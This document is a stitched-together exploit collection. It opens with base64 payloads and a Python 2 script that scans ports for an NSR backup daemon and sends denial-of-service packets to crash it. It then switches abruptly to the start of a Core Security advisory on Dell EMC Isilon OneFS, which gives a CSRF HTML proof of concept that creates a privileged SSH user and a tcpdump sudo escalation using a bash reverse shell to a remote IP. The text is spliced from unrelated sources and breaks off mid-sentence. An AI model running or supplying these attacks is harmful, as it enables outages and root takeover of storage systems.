cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEA
AAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgA
AAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01v
bnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QA
AAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAA
BG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAA
AAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAAB
cwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUA
AAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAA
AAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAA
AAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9u
dGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAA
B01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJp
b2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAAB
AAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwA
AAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEA
AAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJp
ZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAA
AQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAA
AAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAF
TW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAAB
AAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZw
ZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAA
AAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1
bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAA
AAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3Zl
cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEA
AAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgA
AAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01v
bnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QA
AAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAA
BG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAA
AAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAAB
cwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUA
AAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAA
AAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAA
AAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9u
dGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAA
B01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJp
b2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAAB
AAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwA
AAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEA
AAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJp
ZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAA
AQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAA
AAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAF
TW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAAB
AAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZw
ZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAA
AAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1
bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAA
AAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3Zl
cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEA
AAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgA
AAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01v
bnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QA
AAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAA
BG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAA
AAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAAB
cwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUA
AAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAA
AAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAA
AAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9u
dGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAA
B01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJp
b2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAAB
AAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwA
AAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEA
AAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJp
ZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAA
AQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAA
AAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAF
TW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAAB
AAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZw
ZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAA
AAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1
bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAA
AAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3Zl
cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
eXBlAAAAAQAAAAxOU1Igc2NoZWR1bGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA="""

part2 = """gAABBEoWuaoAAAAAAAAAAgAF890AAAACAAAAaAAAdT0AAAAIAAAAAgAAAGgAAHU9AAAACAAAAAFa
FWVkdWxlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIABfPdAAAAAgAAAGgAAHU9AAAACAAAAAFa
FWVkdWxlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="""

hello = """gAACuFkQrJUAAAAAAAAAAgAF89cAAAACAAAAfAAAAAEAAAAgWhbtaAAAAAdhYWFhYWFhAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAduc3JzdGF0AAAAAAFaFu1oWhbtaAAAAANuaXMAAAAABihub25lKQAAAAAAAAAAAAdhYWFhYWFhAAAAAAAAAAAEcm9vdAAAAAEAAAAEcm9vdAAAAAEAAAALYXV0aCBzZXJ2ZXIAAAAAAQAAAA0xMTEuMTExLjEuMTExAAAAAAAAAAAAAAEAAAAIaG9zdG5hbWUAAAABAAAADTExMS4xMTEuMS4xMTEAAAAAAAAAAAAAAQAAAAZsb2NhbGUAAAAAAAEAAAEYTENfQ1RZUEU9ZW5fVVMuVVRGLTg7TENfTlVNRVJJQz1wbF9QTC5VVEYtODtMQ19USU1FPXBsX1BMLlVURi04O0xDX0NPTExBVEU9ZW5fVVMuVVRGLTg7TENfTU9ORVRBUlk9cGxfUEwuVVRGLTg7TENfTUVTU0FHRVM9ZW5fVVMuVVRGLTg7TENfUEFQRVI9cGxfUEwuVVRGLTg7TENfTkFNRT1lbl9VUy5VVEYtODtMQ19BRERSRVNTPWVuX1VTLlVURi04O0xDX1RFTEVQSE9ORT1lbl9VUy5VVEYtODtMQ19NRUFTVVJFTUVOVD1wbF9QTC5VVEYtODtMQ19JREVOVElGSUNBVElPTj1lbl9VUy5VVEYtOAAAAAAAAAABAAAADUxvY2FsT1NfQWRtaW4AAAAAAAABAAAAA1llcwAAAAAAAAAAAQAAABJPTkMgcHJvZ3JhbSBudW1iZXIAAAAAAAEAAAAGMzkwMTA5AAAAAAAAAAAAAQAAABJPTkMgdmVyc2lvbiBudW1iZXIAAAAAAAEAAAABMgAAAAAAAAAAAAAAAAAAAAo="""

res = ''
if nsrd_port == 0:
    for i in range(7000,10000):
        try:
            sys.stdout.write('.')
            s = socket.socket()
            s.connect((nsrd_addr, i))
            s.send(base64.b64decode(hello))
            res = s.recv(4096)
            if '111.111.1.111' in res:
                print "\n\033[31m[!] NSRD FOUND ON PORT: %d\033[0m" % i
                nsrd_port = i
                s.close()
                break
            s.close()
        except Exception:
            pass

print "\n[!] SENDING DOS PACKETS"

s = socket.socket()
s.connect((nsrd_addr, nsrd_port))
s.send(base64.b64decode(part1))
s.recv(256)
s.close()
time.sleep(1)
s = socket.socket()
s.connect((nsrd_addr, nsrd_port))
s.send(base64.b64decode(part2))
s.recv(256)
s.close()
print  "\nDONE."
HireHackking 
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Dell EMC Isilon OneFS Multiple Vulnerabilities

1. **Advisory Information**

Title: Dell EMC Isilon OneFS Multiple Vulnerabilities
Advisory ID: CORE-2017-0009
Advisory URL:
http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities
Date published: 2018-02-14
Date of last update: 2018-02-14
Vendors contacted: Dell EMC
Release mode: Coordinated release

2. **Vulnerability Information**

Class: Cross-Site Request Forgery [CWE-352], Improper Privilege
Management [CWE-269], Improper Privilege Management [CWE-269], Improper
Neutralization of Input During Web Page Generation [CWE-79], Improper
Neutralization of Input During Web Page Generation [CWE-79], Improper
Neutralization of Input During Web Page Generation [CWE-79], Improper
Neutralization of Input During Web Page Generation [CWE-79], Improper
Neutralization of Input During Web Page Generation [CWE-79], Improper
Neutralization of Input During Web Page Generation [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186,
CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201,
CVE-2018-1202

3. **Vulnerability Description**

Dell EMC's website states that:[1]

The EMC Isilon scale-out NAS storage platform combines modular hardware
with unified software to harness unstructured data. Powered by the OneFS
operating system, an EMC Isilon cluster delivers a scalable pool of
storage with a global namespace.

The platform's unified software provides centralized Web-based and
command-line administration to manage the following features:

- A cluster that runs a distributed file system

- Scale-out nodes that add capacity and performance

- Storage options that manage files and tiering

- Flexible data protection and high availability

- Software modules that control costs and optimize resources

Multiple vulnerabilities were found in the Isilon OneFS Web console that
would allow a remote attacker to gain command execution as root.

4. **Vulnerable Packages**

. Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204)
. Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs)
. Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs)
. Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs)
. Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188,
  CVE-2018-1201, CVE-2018-1204, CVE-2018-1213)
. Dell EMC Isilon OneFS version 7.1.1.11 (CVE-2018-1186, CVE-2018-1201,
  CVE-2018-1202, CVE-2018-1204, CVE-2018-1213)

Other products and versions might be affected, but they were not tested.

5. **Vendor Information, Solutions and Workarounds**

Dell EMC provided a link to the Download for Isilon OneFS page which
contains the patches:

. https://support.emc.com/downloads/15209_Isilon-OneFS

6. **Credits**

These vulnerabilities were discovered and researched by Ivan Huertas and
Maximiliano Vidal from Core Security Consulting Services. The
publication of this advisory was coordinated by Alberto Solino from Core
Advisories Team.

7. **Technical Description / Proof of Concept Code**

The Web console contains several sensitive features that are vulnerable
to cross-site request forgery. We describe this issue in section 7.1.

Sections 7.2 and 7.3 show two vectors to escalate privileges to root.

Various persistent cross-site scripting issues are presented in the
remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9).

7.1. **Cross-site request forgery leading to command execution**

[CVE-2018-1213]
There are no anti-CSRF tokens in any forms on the Web interface.
This would allow an attacker to submit authenticated requests when an
authenticated user browses an attacker-controlled domain.

The Web console contains a plethora of sensitive actions that can be
abused, such as adding new users with SSH access or re-mapping existing
storage directories to allow read-write-execute access to all users.

All requests are JSON-encoded, which in some cases might hinder
exploitation of CSRF vulnerabilities. However, the application does not
verify the content-type set. This allows an attacker to exploit the CSRF
vulnerabilities by setting a text/plain content-type and sending the
request body as JSON_PAYLOAD=ignored.

The following proof of concept creates a new user and assigns him a new
role with enough privileges to log in via SSH, configure identifies,
manage authentication providers, configure the cluster and run the
remote support tools.

/-----
<html>
  <body>
    <form id="addUser" target="_blank"
action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem"
method="POST" enctype="text/plain">
      <input type="hidden"
name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}"
value="" />
    </form>
    <form id="addRole" target="_blank"
action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST"
enctype="text/plain">
      <input type="hidden"
name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote
Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}"
value="" />
    </form>
    <script>
      document.getElementById("addUser").submit();
      window.setTimeout(function() {
document.getElementById("addRole").submit() }, 1000);
    </script>
  </body>
</html>
-----/

7.2. **Privilege escalation due to incorrect sudo permissions**

[CVE-2018-1203]
The compadmin user can run the tcpdump binary with root privileges via
sudo. This allows for local privilege escalation, as tcpdump can be
instructed to run shell commands when rotating capture files.

/-----
pepe-1$ id
uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon)
pepe-1$ cat /tmp/lala.sh
#!/bin/bash

bash -i >& /dev/tcp/192.168.1.66/8888 0>&1
-----/

Once the desired shell script is in place, the attacker can run tcpdump
